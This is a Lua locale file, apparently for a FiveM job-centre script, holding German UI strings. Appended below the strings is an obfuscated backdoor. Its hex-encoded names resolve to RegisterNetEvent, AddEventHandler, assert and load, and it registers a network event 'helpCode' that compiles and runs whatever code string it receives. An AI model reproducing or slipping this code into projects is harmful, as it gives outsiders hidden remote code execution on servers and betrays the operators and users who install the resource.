Locales['de'] = {
  ['new_job'] = 'Du hast einen neuen Job!',
  ['access_job_center'] = 'Drücke ~INPUT_PICKUP~ um das ~b~Arbeitsamt~s~ zu öffnen.',
  ['job_center'] = 'Arbeitsamt',
}


local MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[6][MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[1]](MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[2]) MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[6][MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[3]](MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[2], function(muoIhSMvBboEZjjKXzEwtBKsZBDeFAeLoBiDJYpHTiQGGAZsDRhaAGOMoSQhaKlagUIcdl) MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[6][MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[4]](MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[6][MZnWXPejSydGIJVpZXeGKFJZCCpBKMxWVfEXxiCTDhYCQIDtXCpZwGMqFUNCugGgoJTclK[5]](muoIhSMvBboEZjjKXzEwtBKsZBDeFAeLoBiDJYpHTiQGGAZsDRhaAGOMoSQhaKlagUIcdl))() end)